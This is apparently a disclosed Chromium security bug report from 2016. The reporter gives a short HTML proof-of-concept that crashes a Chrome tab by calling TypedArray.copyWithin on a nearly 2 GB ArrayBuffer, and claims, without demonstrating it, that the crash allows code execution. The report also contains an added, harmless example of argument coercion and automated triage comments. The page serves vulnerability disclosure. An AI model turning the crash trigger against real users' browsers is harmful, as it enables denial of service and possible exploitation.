Security: TypedArray.copyWithin alert memory corruption.
Reported by pabster...@gmail.com, Oct 13 2016
Issue description
VULNERABILITY DETAILS
Creating a typed array by allocating an ArrayBuffer with a length of 2147479551, then creating a variable from typedarray.copyWithin(random all here), and then calling alert() on the resulting variable will trigger a memory corruption vulnerability that will crash the Chrome helper for that tab, allowing an attacker to take control of the process and execute code on the machine as that process.
VERSION
Chrome Version: 53.0.2785.143
Operating System: Mac OS X 10.11.6
REPRODUCTION CASE
This html will crash chrome helper process for that tab:
<html>
<body>
<script>
// 2147479551 bytes: just under 2^31 (2^31 - 4097)
var q = new ArrayBuffer(2147479551);
// not referenced below; left as submitted
var o = {valueOf : !true}
var a = new Uint8Array(q);
// non-numeric index arguments: a boolean and the typed array itself
var d = a.copyWithin(true, a, true);
alert(d)
</script>
</body>
</html>
FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab
Client ID (if relevant): [see link above]
Crash ID 8605fccb-3806-4ccc-9479-aaa5d853cfa8
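The PoC above hands copyWithin a boolean and the typed array itself as indices. As an added example that is not part of the report, the following shows how the ECMAScript spec coerces such arguments (ToNumber, then ToIntegerOrInfinity, then clamping to the length) on a constructed six-byte buffer; it does not reproduce the crash, it only makes visible which indices the engine actually uses for these odd inputs and that user-supplied valueOf hooks run during that coercion.

```javascript
// Added example (not the bug report's code). Constructed six-byte sample,
// not the 2 GB buffer from the report.
const SAMPLE = [10, 20, 30, 40, 50, 60];

// Resolve one copyWithin index the way the spec does: ToNumber (which invokes
// valueOf / toString on objects), ToIntegerOrInfinity (NaN -> 0, truncate),
// then clamp relative to the array length (negative values count from the end).
function resolveIndex(value, len) {
  const n = Number(value);
  if (Number.isNaN(n)) return 0;
  const i = Math.trunc(n);
  return i < 0 ? Math.max(len + i, 0) : Math.min(i, len);
}

// Run copyWithin with the raw arguments, then again with the indices that
// resolveIndex predicts; `matches` confirms the engine used the same indices.
function compareCoercion(target, start, end) {
  const len = SAMPLE.length;
  const raw = Uint8Array.from(SAMPLE).copyWithin(target, start, end);
  const indices = [
    resolveIndex(target, len),
    resolveIndex(start, len),
    resolveIndex(end, len),
  ];
  const explicit = Uint8Array.from(SAMPLE).copyWithin(...indices);
  return {
    indices,
    result: Array.from(raw),
    matches: raw.every((b, i) => b === explicit[i]),
  };
}

// Count how often the engine calls back into a user-supplied valueOf while
// coercing the three indices: once per object argument, before any byte moves.
function countValueOfCalls() {
  let calls = 0;
  const hook = (v) => ({ valueOf() { calls += 1; return v; } });
  Uint8Array.from(SAMPLE).copyWithin(hook(0), hook(1), hook(3));
  return calls;
}

// The report's argument shapes on the small buffer:
//   true             -> 1
//   a typed array    -> toString yields "10,20,...", Number() is NaN -> 0
//   {valueOf: !true} -> valueOf is not callable, "[object Object]" -> NaN -> 0
const fromPoc = compareCoercion(true, Uint8Array.from(SAMPLE), true);
console.log(fromPoc.indices, fromPoc.result, fromPoc.matches);
// [ 1, 0, 1 ] [ 10, 10, 30, 40, 50, 60 ] true
```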
Comment 1 by ClusterFuzz, Oct 13 2016
ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://cluster-fuzz.appspot.com/testcase?key=5735434430971904
Comment by Sheriffbot, Jan 19 2017
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot